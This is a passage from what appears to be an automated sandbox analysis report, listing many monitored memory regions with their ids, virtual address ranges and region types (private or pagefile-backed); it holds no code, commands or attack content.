0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21573 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21574 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21575 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21576 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21577 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21578 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21579 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21580 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 21581 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21582 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21583 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21584 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21585 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21586 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21587 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21588 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21589 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21590 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21591 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21592 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21593 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21594 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21595 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21596 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21597 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21598 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21599 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21600 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21601 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21602 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21603 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21604 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21605 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21606 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21607 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21608 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21609 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21610 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21611 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21612 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21613 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21614 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21615 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21616 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21617 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21618 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21619 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21620 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21621 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21622 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21623 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21624 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21625 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21626 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21627 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21628 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21629 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21630 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21631 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21632 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21633 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21634 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21635 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21636 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21637 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21638 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21639 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21640 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21641 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21642 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21643 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21644 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21645 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21646 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21647 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21648 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21649 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21650 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21651 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21652 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21653 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21654 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21655 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21656 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21657 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21658 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21659 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21660 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21661 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21662 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21663 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21664 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21665 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21666 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21667 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21668 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21669 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21670 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21671 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21672 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21673 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21674 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21675 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21676 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21677 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21678 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21679 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21680 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21681 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21682 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21683 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21684 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21685 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21686 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21687 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21688 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21689 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21690 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21691 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21692 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21693 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21694 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21695 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21696 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21697 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21698 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21699 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21700 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21701 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21702 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21703 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21704 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21705 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21706 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21707 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21708 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21709 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21710 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21711 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21712 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21713 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21714 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21715 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21716 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21717 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21718 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21719 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21720 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21721 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21722 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21723 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21724 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21725 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21726 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21727 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21728 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21729 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21730 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21731 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21732 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21733 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21734 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21735 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21736 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21737 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21738 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21739 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21740 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21741 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21742 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21743 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21744 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21745 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21746 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21747 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21748 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21749 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21750 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21751 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21752 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21753 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21754 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21755 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21756 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21757 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21758 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21759 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21760 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21761 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21762 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21763 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21764 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21765 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21766 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21767 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21768 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21769 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 